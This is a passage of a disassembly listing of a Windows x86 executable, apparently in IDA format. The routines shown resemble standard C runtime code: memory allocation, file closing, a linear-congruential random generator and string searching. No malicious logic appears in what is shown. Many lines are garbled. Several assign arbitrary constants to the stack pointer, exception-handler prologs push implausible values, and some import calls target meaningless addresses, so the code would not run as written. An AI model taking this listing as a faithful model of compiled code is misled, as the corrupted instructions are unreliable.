jb short loc_402FBF
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407BF0
add esp, 0Ch
jmp short loc_402F80
; ---------------------------------------------------------------------------
loc_402FBF: ; CODE XREF: sub_402F72+35�j
; sub_402F72+3A�j
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_402F89
cmp [ebp+arg_4], esi
jnb short loc_402FE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402F93
; ---------------------------------------------------------------------------
loc_402FE6: ; CODE XREF: sub_402F72+64�j
push 16h
pop eax
loc_402FE9: ; CODE XREF: sub_402F72+10�j
; sub_402F72+30�j
pop edi
pop esi
pop ebp
retn
sub_402F72 endp
; =============== S U B R O U T I N E =======================================
sub_402FED proc near ; CODE XREF: .kSjx934:00402FFE�p
push ecx
mov dword ptr [ecx], offset off_41D38C
call sub_407F55
pop ecx
retn
sub_402FED endp
; ---------------------------------------------------------------------------
loc_402FFB: ; DATA XREF: .kSjx934:off_41D38C�o
push esi
mov esi, ecx
call sub_402FED
test byte ptr [esp+8], 1
jz short loc_403011
push esi
call sub_402F6D
pop ecx
loc_403011: ; CODE XREF: .kSjx934:00403008�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_403017 proc near ; CODE XREF: sub_40BA07+12D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_407FD0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_403017 endp
; =============== S U B R O U T I N E =======================================
sub_403032 proc near ; CODE XREF: sub_40304B+3B�p
push esi
push 1
push 113E20h
mov esi, ecx
call sub_402C5A
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn
sub_403032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40304B proc near ; CODE XREF: sub_401291+5�p
; sub_401395+5�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_403060
; ---------------------------------------------------------------------------
loc_403053: ; CODE XREF: sub_40304B+20�j
push [ebp+arg_0]
call sub_408062
test eax, eax
pop ecx
jz short loc_40306F
loc_403060: ; CODE XREF: sub_40304B+6�j
push [ebp+arg_0]
call sub_4036E0
test eax, eax
pop ecx
jz short loc_403053
leave
retn
; ---------------------------------------------------------------------------
loc_40306F: ; CODE XREF: sub_40304B+13�j
test byte ptr ds:dword_425A90, 1
mov esp, 28913Eh
jnz short loc_403096
or ds:dword_425A90, 1
mov ecx, esi
call sub_403032
push 14489Fh
call sub_402E21
pop ecx
loc_403096: ; CODE XREF: sub_40304B+30�j
push esi
lea ecx, [ebp+var_C]
call sub_402C72
push 0A244Fh
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
sub_40304B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030B5 proc near ; CODE XREF: sub_4190BD+84�p
; sub_4190BD+102�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4030E0
loc_4030C3: ; CODE XREF: sub_4030B5+30�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40312D
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_4030B5+C�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4030C3
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_4069D7
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_40311E
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40312A
; ---------------------------------------------------------------------------
loc_40311E: ; CODE XREF: sub_4030B5+60�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40312A: ; CODE XREF: sub_4030B5+67�j
mov eax, esi
pop esi
loc_40312D: ; CODE XREF: sub_4030B5+29�j
pop ebx
leave
retn
sub_4030B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403130 proc near ; CODE XREF: sub_4031F4+A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push 451227h
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov edi, [ebp+arg_0]
cmp edi, ebx
setnz al
cmp eax, ebx
jnz short loc_40316B
loc_40314F: ; CODE XREF: sub_403130+47�j
; sub_403130+52�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
loc_403167: ; CODE XREF: sub_403130+6B�j
; sub_403130+92�j
xor eax, eax
jmp short loc_4031E4
; ---------------------------------------------------------------------------
loc_40316B: ; CODE XREF: sub_403130+1D�j
xor eax, eax
mov esi, [ebp+arg_4]
cmp esi, ebx
setnz al
cmp eax, ebx
jz short loc_40314F
xor eax, eax
cmp [esi], bl
setnz al
cmp eax, ebx
jz short loc_40314F
call sub_4084A1
mov [ebp+arg_0], eax
cmp eax, ebx
jnz short loc_40319D
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_40319D: ; CODE XREF: sub_403130+5E�j
mov [ebp+ms_exc.disabled], ebx
cmp [edi], bl
jnz short loc_4031C4
call sub_4057D3
mov dword ptr [eax], 16h
push 0FFFFFFFEh
lea eax, [ebp+ms_exc.prev_er]
push eax
push 628913h
call sub_4085C8
add esp, 0Ch
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403130+72�j
push eax
push [ebp+arg_8]
push esi
push edi
call sub_4081FF
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4031EA
mov eax, [ebp+var_1C]
loc_4031E4: ; CODE XREF: sub_403130+39�j
call __SEH_epilog4
retn
sub_403130 endp
; =============== S U B R O U T I N E =======================================
sub_4031EA proc near ; CODE XREF: sub_403130+AC�p
; DATA XREF: .kSjx934:00421360�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_4031EA endp
; =============== S U B R O U T I N E =======================================
sub_4031F4 proc near ; CODE XREF: sub_4190BD+116�p
; sub_41B3D0+4E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403130
add esp, 0Ch
retn
sub_4031F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403207 proc near ; CODE XREF: sub_4190BD+131�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 0Ch
push 714489h
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov esi, [ebp+arg_0]
cmp esi, ebx
setnz al
cmp eax, ebx
jnz short loc_403246
loc_403226: ; CODE XREF: sub_403207+49�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403346
; ---------------------------------------------------------------------------
loc_403246: ; CODE XREF: sub_403207+1D�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
cmp eax, ebx
jz short loc_403226
mov [ebp+arg_0], esi
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], ebx
test byte ptr [esi+0Ch], 40h
jnz loc_40330F
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032A3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032A3
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032A8
; ---------------------------------------------------------------------------
loc_4032A3: ; CODE XREF: sub_403207+6C�j
; sub_403207+78�j
mov esp, 45C512h
loc_4032A8: ; CODE XREF: sub_403207+9A�j
test byte ptr [eax+24h], 7Fh
jnz short loc_4032F3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032E8
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032E8
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032ED
; ---------------------------------------------------------------------------
loc_4032E8: ; CODE XREF: sub_403207+B1�j
; sub_403207+BD�j
mov edx, 655C51h
loc_4032ED: ; CODE XREF: sub_403207+DF�j
test byte ptr [eax+24h], 80h
jz short loc_40330F
loc_4032F3: ; CODE XREF: sub_403207+A5�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or [ebp+var_1C], 0FFFFFFFFh
loc_40330F: ; CODE XREF: sub_403207+5C�j
; sub_403207+EA�j
cmp [ebp+var_1C], ebx
jnz short loc_403337
push esi
call sub_40871B
mov edi, eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
push esi
call sub_4069D7
mov [ebp+var_1C], eax
push esi
push edi
call sub_4087B1
add esp, 1Ch
loc_403337: ; CODE XREF: sub_403207+10B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40334C
mov eax, [ebp+var_1C]
loc_403346: ; CODE XREF: sub_403207+3A�j
call __SEH_epilog4
retn
sub_403207 endp
; =============== S U B R O U T I N E =======================================
sub_40334C proc near ; CODE XREF: sub_403207+137�p
; DATA XREF: .kSjx934:00421380�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_40334C endp
; =============== S U B R O U T I N E =======================================
sub_403356 proc near ; CODE XREF: sub_41748B+4F�p
; sub_41A9DE+20F�p
arg_0 = dword ptr 4
call sub_40539D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_403356 endp
; =============== S U B R O U T I N E =======================================
sub_403363 proc near ; CODE XREF: sub_41748B:loc_417607�p
; sub_4190BD+A7�p ...
call sub_40539D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_403363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403385 proc near ; CODE XREF: sub_403436+12�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_4033B3
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403433
; ---------------------------------------------------------------------------
loc_4033B3: ; CODE XREF: sub_403385+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_4033DF
cmp esi, ebx
jnz short loc_4033DF
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_403432
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_403385+37�j
; sub_403385+3B�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_4033EE
mov [ebp+var_1C], ecx
loc_4033EE: ; CODE XREF: sub_403385+64�j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_403431
dec [ebp+var_1C]
js short loc_403423
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: sub_403385+95�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40342F: ; CODE XREF: sub_403385+9C�j
mov eax, edi
loc_403431: ; CODE XREF: sub_403385+90�j
pop edi
loc_403432: ; CODE XREF: sub_403385+58�j
pop esi
loc_403433: ; CODE XREF: sub_403385+29�j
pop ebx
leave
retn
sub_403385 endp
; =============== S U B R O U T I N E =======================================
sub_403436 proc near ; CODE XREF: sub_4172CC+3E�p
; sub_417361+7C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_403385
add esp, 14h
retn
sub_403436 endp
; =============== S U B R O U T I N E =======================================
sub_403451 proc near ; CODE XREF: sub_4034C4+5A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40347E
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4034C0
; ---------------------------------------------------------------------------
loc_40347E: ; CODE XREF: sub_403451+E�j
test byte ptr [esi+0Ch], 83h
jz short loc_4034BB
push esi
call sub_408BDA
push esi
mov ebx, eax
call sub_408BAE
push esi
call sub_408A20
push eax
call sub_408AE1
add esp, 10h
test eax, eax
jge short loc_4034AA
or ebx, 0FFFFFFFFh
jmp short loc_4034BB
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403451+52�j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_4034BB
push eax
call sub_403603
pop ecx
mov [esi+1Ch], edi
loc_4034BB: ; CODE XREF: sub_403451+31�j
; sub_403451+57�j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_4034C0: ; CODE XREF: sub_403451+2B�j
pop edi
pop esi
pop ebx
retn
sub_403451 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C4 proc near ; CODE XREF: sub_40DFD3+43�p
; sub_4190BD+137�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 3AAE28h
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_403501
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40350D
; ---------------------------------------------------------------------------
loc_403501: ; CODE XREF: sub_4034C4+1E�j
test byte ptr [esi+0Ch], 40h
jz short loc_403513
mov [esi+0Ch], edi
loc_40350A: ; CODE XREF: sub_4034C4+6F�j
mov eax, [ebp+var_1C]
loc_40350D: ; CODE XREF: sub_4034C4+3B�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403513: ; CODE XREF: sub_4034C4+41�j
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_403451
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403538
jmp short loc_40350A
sub_4034C4 endp
; =============== S U B R O U T I N E =======================================
sub_403535 proc near ; DATA XREF: .kSjx934:004213A0�o
mov esi, [ebp+8]
sub_403535 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403538 proc near ; CODE XREF: sub_4034C4+6A�p
push esi
call sub_4081AD
pop ecx
retn
sub_403538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403540 proc near ; CODE XREF: .kSjx934:004192C0�p
; sub_4192FB+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword ptr ds:5D5714h
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 2EAB8Ah
adc ecx, 0FE624E21h
push ecx
push eax
call sub_408D70
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_40357A
mov [ecx], eax
mov [ecx+4], edx
locret_40357A: ; CODE XREF: sub_403540+33�j
leave
retn
sub_403540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_4035E4+15�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push esi
call sub_404130
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_4035AD
loc_403590: ; CODE XREF: sub_40357C+34�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4035E1
; ---------------------------------------------------------------------------
loc_4035AD: ; CODE XREF: sub_40357C+12�j
cmp [ebp+arg_4], edi
jz short loc_403590
mov ecx, 7FFFFFFFh
cmp eax, ecx
mov [ebp+var_14], 49h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
ja short loc_4035CE
mov [ebp+var_1C], eax
loc_4035CE: ; CODE XREF: sub_40357C+4D�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call [ebp+arg_0]
add esp, 10h
loc_4035E1: ; CODE XREF: sub_40357C+2F�j
pop edi
leave
retn
sub_40357C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4035E4 proc near ; CODE XREF: sub_401F1C+22E�p
; sub_401F1C+36B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
lea eax, [esp+4+arg_8]
push eax
push 0
push [esp+0Ch+arg_4]
push 1755C5h
call sub_40357C
add esp, 10h
pop esi
retn
sub_4035E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403603 proc near ; CODE XREF: sub_402CCA+F�p sub_402F6D�j ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00403662 SIZE 0000002F BYTES
push 0Ch
push 4BAAE2h
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_40368B
cmp ds:dword_434DF4, 3
jnz short loc_403662
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_405B25
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_403642
push esi
push eax
call sub_405B50
pop ecx
pop ecx
loc_403642: ; CODE XREF: sub_403603+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403659
cmp [ebp+var_1C], 0
jnz short loc_40368B
push [ebp+arg_0]
jmp short loc_403663
sub_403603 endp
; =============== S U B R O U T I N E =======================================
sub_403659 proc near ; CODE XREF: sub_403603+46�p
; DATA XREF: .kSjx934:004213C0�o
push 4
call sub_40591F
pop ecx
retn
sub_403659 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403603
loc_403662: ; CODE XREF: sub_403603+1A�j
push esi
loc_403663: ; CODE XREF: sub_403603+54�j
push 0
push ds:dword_425F68
call dword ptr ds:25D571h
test eax, eax
jnz short loc_40368B
call sub_4057D3
mov esi, eax
call dword ptr ds:52EAB8h
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40368B: ; CODE XREF: sub_403603+11�j
; sub_403603+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_403603
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403691 proc near ; CODE XREF: sub_4036E0+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 29755Ch
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, ds:dword_434DE4
ja short loc_4036CE
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4036D7
loc_4036CE: ; CODE XREF: sub_403691+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403691 endp
; =============== S U B R O U T I N E =======================================
sub_4036D7 proc near ; CODE XREF: sub_403691+38�p
; DATA XREF: .kSjx934:004213E0�o
push 4
call sub_40591F
pop ecx
retn
sub_4036D7 endp
; =============== S U B R O U T I N E =======================================
sub_4036E0 proc near ; CODE XREF: sub_402C0C+1F�p
; sub_402C72+2A�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_40378D
push ebx
mov ebx, ds:dword_41D114
push esi
push edi
loc_4036F7: ; CODE XREF: sub_4036E0+94�j
xor esi, esi
cmp ds:dword_425F68, esi
mov edi, ebp
jnz short loc_40371B
call sub_409C54
push 1Eh
call sub_409AB4
push 54BAAEh
call sub_4078A7
pop ecx
pop ecx
loc_40371B: ; CODE XREF: sub_4036E0+21�j
mov eax, ds:dword_434DF4
cmp eax, 1
jnz short loc_403733
cmp ebp, esi
jz short loc_40372D
mov eax, ebp
jmp short loc_403730
; ---------------------------------------------------------------------------
loc_40372D: ; CODE XREF: sub_4036E0+47�j
xor eax, eax
inc eax
loc_403730: ; CODE XREF: sub_4036E0+4B�j
push eax
jmp short loc_403751
; ---------------------------------------------------------------------------
loc_403733: ; CODE XREF: sub_4036E0+43�j
cmp eax, 3
jnz short loc_403743
push ebp
call sub_403691
cmp eax, esi
pop ecx
jnz short loc_40375A
loc_403743: ; CODE XREF: sub_4036E0+56�j
cmp ebp, esi
jnz short loc_40374A
xor edi, edi
inc edi
loc_40374A: ; CODE XREF: sub_4036E0+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403751: ; CODE XREF: sub_4036E0+51�j
push esi
push ds:dword_425F68
call ebx
loc_40375A: ; CODE XREF: sub_4036E0+61�j
mov esi, eax
test esi, esi
jnz short loc_403786
cmp ds:dword_4262EC, eax
push 0Ch
pop edi
jz short loc_403778
push ebp
call sub_408062
test eax, eax
pop ecx
jnz short loc_4036F7
jmp short loc_40377F
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_4036E0+89�j
call sub_4057D3
mov [eax], edi
loc_40377F: ; CODE XREF: sub_4036E0+96�j
call sub_4057D3
mov [eax], edi
loc_403786: ; CODE XREF: sub_4036E0+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40378D: ; CODE XREF: sub_4036E0+8�j
push ebp
call sub_408062
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_4036E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037B0 proc near ; CODE XREF: sub_41783D+84�p
; sub_4184BF+1B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_403830
mov dh, [ecx+1]
test dh, dh
jz short loc_40381D
loc_4037C8: ; CODE XREF: sub_4037B0+58�j
; sub_4037B0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_4037EE
test al, al
jz short loc_4037E8
loc_4037DB: ; CODE XREF: sub_4037B0+36�j
mov al, [esi]
add esi, 1
loc_4037E0: ; CODE XREF: sub_4037B0+45�j
cmp al, dl
jz short loc_4037EE
test al, al
jnz short loc_4037DB
loc_4037E8: ; CODE XREF: sub_4037B0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4037EE: ; CODE XREF: sub_4037B0+25�j
; sub_4037B0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_4037E0
lea edi, [esi-1]
loc_4037FA: ; CODE XREF: sub_4037B0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_403829
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4037C8
mov al, [ecx+3]
test al, al
jz short loc_403829
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4037FA
jmp short loc_4037C8
; ---------------------------------------------------------------------------
loc_40381D: ; CODE XREF: sub_4037B0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_403856
; ---------------------------------------------------------------------------
loc_403829: ; CODE XREF: sub_4037B0+4F�j
; sub_4037B0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_403830: ; CODE XREF: sub_4037B0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4037B0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_403850
loc_403840: ; CODE XREF: sub_403850+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_403850
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_41837F+B�p
; sub_418396+35�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00403840 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_403856: ; CODE XREF: sub_4037B0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40387D
loc_403868: ; CODE XREF: sub_403850+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_403840
test cl, cl
jz short loc_4038C6
test edx, 3
jnz short loc_403868
loc_40387D: ; CODE XREF: sub_403850+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_403888: ; CODE XREF: sub_403850+63�j
; sub_403850+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4038CA
and eax, 81010100h
jz short loc_403888
and eax, 1010100h
jnz short loc_4038C4
and esi, 80000000h
jnz short loc_403888
loc_4038C4: ; CODE XREF: sub_403850+6A�j
; sub_403850+83�j ...
pop esi
pop edi
loc_4038C6: ; CODE XREF: sub_403850+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4038CA: ; CODE XREF: sub_403850+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_403907
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_403900
test ah, ah
jz short loc_4038C4
shr eax, 10h
cmp al, bl
jz short loc_4038F9
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_4038F2
test ah, ah
jz short loc_4038C4
jmp short loc_403888
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: sub_403850+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4038F9: ; CODE XREF: sub_403850+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403900: ; CODE XREF: sub_403850+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403907: ; CODE XREF: sub_403850+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_403850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403910 proc near ; CODE XREF: sub_417676+104�p
; sub_41783D+D9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4039AF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40393C
